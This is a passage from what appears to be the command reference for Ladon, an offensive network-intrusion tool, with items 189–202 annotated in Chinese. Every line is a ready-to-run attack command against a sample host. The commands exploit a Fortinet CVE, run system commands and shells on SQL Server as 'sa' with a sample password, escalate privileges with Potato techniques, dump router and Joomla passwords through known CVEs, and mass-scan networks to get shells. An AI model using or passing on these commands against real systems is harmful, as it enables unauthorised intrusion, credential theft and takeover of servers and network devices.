Ladon https://192.168.1.8 CVE-2022-40684
Ladon 192.168.1.8/24 CVE-2022-40684
Ladon url.txt CVE-2022-40684
##### 189 MssqlCmd SQL Server远程执行命令 SQL版本、OS信息 xp_cmdshell
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master info
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master open_cmdshell
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master xp_cmdshell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master r_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master ws_shell whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master py_cmdshell whoami
##### 190 MssqlCmd SQL Server远程执行命令 efspotato、badpotato提权
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master install_clr
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master uninstall_clr
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_exec whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_efspotato whoami
Ladon MssqlCmd 192.168.1.8 sa k8gege520 master clr_badpotato whoami
##### 191 CVE-2018-14847 Mikrotik RouterOS 6.29-6.42版本密码读取
Ladon 192.168.1.8 CVE-2018-14847
Ladon ip.txt CVE-2018-14847
##### 192 ZteScan 中兴路由器光猫Web默认口令检测
Ladon 192.168.1.8 ZteScan
Ladon ip.txt ZteScan
Ladon http://192.168.1.8 ZteScan
Ladon url.txt ZteScan
##### 193 MSNSwitchPwd CVE-2022-32429 MSNSwitch路由器密码读取
Ladon https://192.168.1.8 MSNSwitchPwd
Ladon url.txt MSNSwitchPwd 批量探测MSNSwitch漏洞并导出用户密码
##### 194 NetGearPwd NetGear DGND3700v2路由器密码读取
Ladon https://192.168.1.8 NetGearPwd
Ladon url.txt NetGearPwd 批量NetGear漏洞导出用户密码
##### 195 T3协议探测WebLogic版本
Ladon 192.168.1.8/24 T3Info
Ladon 192.168.1.8:7001 T3Info
Ladon http://192.168.1.8:7001 T3Info
##### 196 InfoScan多个模块探测系统信息
Ladon 192.168.1.8/24 InfoScan
Ladon 192.168.1.8 InfoScan
##### 197 VulScan PocScan多个远程漏洞检测
Ladon 192.168.1.8/24 VulScan
Ladon 192.168.1.8 PocScan
Ladon http://192.168.1.8 PocScan
##### 198 ExpScan多个漏洞利用GetShell
Ladon 192.168.1.8/24 ExpScan
Ladon 192.168.1.8 ExpScan
Ladon http://192.168.1.8 ExpScan
##### 199 JoomlaPwd CVE-2023-23752 未授权网站数据库密码读取
Ladon 192.168.1.8/24 JoomlaPwd
Ladon 192.168.1.8 JoomlaPwd
Ladon http://192.168.1.8 JoomlaPwd
Ladon url.txt JoomlaPwd
##### 200 AllScan 所有模块
Ladon 192.168.1.8/24 AllScan
Ladon 192.168.1.8 AllScan
Ladon http://192.168.1.8 AllScan
##### 201 探测Citrix Gateway版本
Ladon https://192.168.1.8 CitrixVer
Ladon 192.168.1.8/24 CitrixVer
Ladon url.txt CitrixVer
##### 202 探测Vmware Vcenter版本
Ladon https://192.168.1.8 VmwareVer
Ladon 192.168.1.8/24 VmwareVer
Ladon url.txt VcenterVer
=======================================================